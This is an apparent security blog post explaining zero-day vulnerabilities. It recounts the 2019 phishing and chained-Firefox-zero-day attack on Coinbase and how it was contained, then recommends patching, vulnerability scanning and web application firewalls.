Coinbase — one of the biggest cryptocurrency exchanges in the US — was targeted by attackers during May-June 2019. Fortunately, Coinbase foiled the attack — “a sophisticated, highly targeted, thought out attack,” per Coinbase.

The attack aimed at compromising its systems with the goal of accessing the funds of its users — cryptocurrencies worth billions of dollars. The attack was planned using two zero-day vulnerabilities in Mozilla Firefox (an open-source web browser). However, its team detected and stopped the attack on time.

This brings us to the question: what are zero-day vulnerabilities and how one can defend against them? Let’s find their answers one by one in this post.

What is a Zero-day Vulnerability?

A zero-day exploit (also known as 0-day) — vulnerability is a software vulnerability that is unknown or unaddressed by the concerned parties. Since the vulnerability is not yet known or mitigated, computer hackers can leverage this opportunity to exploit the vulnerability to compromise the software, its data, or the connected machines or networks. Consequently, this attack or exploit is known as zero-day attack or zero-day exploit since they both utilize a zero-day vulnerability.

What’s a software vulnerability? A bug or vulnerability is a flaw in a software or operating system. The root cause of a bug or flaw can be a development error or improper configuration. In either case, a vulnerability — if unaddressed or unfixed — creates a security hole, which may get used by cybercriminals.

How’s a vulnerability exploited? “Hackers write code to target a specific security weakness. They package it into malware called a zero-day exploit. The malicious software takes advantage of a vulnerability to compromise a computer system or cause an unintended behavior,” according to Norton — a security expert.

An exploit may compromise your system with the goal of controlling it, locking you out of it, spying on your digital activities, stealing or locking your data for ransom, etc. Also, such an exploit may be directly distributed via infected media or websites and mailing lists or combined with other types of attacks to launch a more sophisticated attack — as was the case with the attack on Coinbase.

How was Coinbase Attacked?

The attack used a mix of strategies — spear phishing and social engineering combined with two zero-day vulnerabilities. In May-end, attackers sent several phishing emails from Gregory Harris, a Research Grants Administrator at the University of Cambridge. These emails contained no attachments or links and passed all security tests. Thus, they seemed legitimate to the recipients.

However; “on June 17 at 6:31am, Gregory Harris sent another email, but this one was different. It contained a URL that, when opened in Firefox, would install malware capable of taking over someone’s machine. Coinbase Security quickly discovered that these emails were anything but ordinary … Within a matter of hours, Coinbase Security detected and blocked the attack,” wrote Coinbase.

The attackers chained two zero-day vulnerabilities together for this attack. The first one allowed an attacker to raise privileges from a page to the browser via JavaScript (CVE-2019–11707). The other one allowed the attacker to compromise the browser sandbox to run code on the host machine (CVE-2019–11708). As it’s said above, these zero-day vulnerabilities were targeting Mozilla Firefox.

How did Coinbase Defend it?

Coinbase expected an attack;  it was ready with an attack detection and response strategy. That’s why it was able to foil the attack attempt. “We were able to defend ourselves from this attack due to our security-first culture at Coinbase, complete deployment of our detection and response tooling, clear and well-practiced playbooks, and the ability to rapidly revoke access,” according to Coinbase.

First and foremost, Coinbase gives security training to its employees. The attack was first noticed and reported by one of the employees. Also, it was flagged by their attack detection system. Then, their security team examined the machine of the employee in question. They found that Mozilla Firefox shelled out to curl — a popular tool to transfer data over various protocols including HTTP.

This was suspicious enough for them to understand they were looking at an attack. They tried to find the scope of the attack, then they investigated their networks for suspicious activities. Then finally, they isolated the attack on the compromised machine by revoking all credentials and locking all accounts of the concerned employee. That’s how they were able to contain the attack.

How to Prevent Zero-day Exploits?

There are various types of defense techniques to detect and defend against zero-day exploits. “The research community has broadly classified the defense techniques against zero-day exploits as statistical-based, signature-based, behavior-based, and hybrid techniques (Kaur & Singh, 2014). The primary goal of each of these techniques is to identify the exploit in real time or as close to real time as possible and quarantine the specific attack to eliminate or minimize the damage caused by the attack,” according to a whitepaper by SANS Institute.

However, you don’t need to apply all these defense techniques, but you must confirm that your security solution implements these techniques. That said, let’s discuss the essential measures you must undertake in your organization.

1. Update your Systems

Since zero-day exploits are based on new or unpatched vulnerabilities, it’s best to update the software as well as the operating system regularly. If the patch is available, attackers find and target machines with unpatched software.

It was the case with Heartbleed — a critical bug in OpenSSL, an open-source cryptographic library that implements SSL/TLS (the encryption methodology used to secure the Internet). “Now slightly over two months after Heartbleed, we scanned … found 300k (309,197) still vulnerable,” wrote Errata Security.

2. Scan for Vulnerabilities

It’s not enough to just update systems; you must do vulnerability scans since they may identify zero-day vulnerabilities. Such solutions simulate attacks and carry out code reviews on the concerned software (say, after an update) to find new vulnerabilities. If a vulnerability is found, the security team must perform code reviews, test the software, and sanitize the vulnerable code quickly.

In most cases, organizations are slow to respond to such security reports, and this usually results in a successful attack. Why? The attackers are mostly quick to exploit a zero-day vulnerability as was the case with the attack on Coinbase. It was also the case with Equifax — a credit bureau in the US. The security team at Equifax was two-months slow in patching a bug in Apache Struts, which led to a data breach of its 147 million customers including their personal data.

3. Opt for an App Firewall

Web Application Firewall (WAF) is a specialized firewall that acts as a shield between your software and the web of malicious actors. It monitors the traffic coming to your application in order to detect and block malicious traffic.

A WAF protects against the most critical security risks and vulnerabilities including zero-day vulnerabilities. It usually implements some attack detection and attack validation features that help to filter out attacks. Then, it may also integrate with other security solutions to provide an umbrella solution.

That’s all about the zero-day vulnerabilities and how you can defend against the zero-day exploits.